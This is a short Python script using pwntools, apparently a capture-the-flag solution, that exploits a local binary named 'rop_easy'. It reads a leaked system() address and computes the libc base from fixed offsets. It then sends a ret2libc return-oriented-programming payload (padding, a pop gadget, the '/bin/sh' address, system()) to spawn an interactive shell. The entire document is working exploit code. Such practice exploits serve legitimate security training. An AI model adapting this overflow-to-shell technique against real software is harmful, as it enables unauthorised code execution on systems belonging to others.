from pwn import *

system_offset = 0x45390
bin_sh_offset = 0x18cd57
pop_ret = 0x400753

r = process('./rop_easy')

r.recvuntil('system leak plz:')
sys_leak = r.recvline()
log.info("found leak for system: %s" % sys_leak)

sys_addr = int(sys_leak, 16)
libc_base = sys_addr - system_offset

log.success("found libc base!: 0x%x" % libc_base)

payload = 'A'*40
payload += p64( pop_ret )
payload += p64( libc_base + bin_sh_offset )
payload += p64( libc_base + system_offset )

r.sendline( payload )

r.interactive()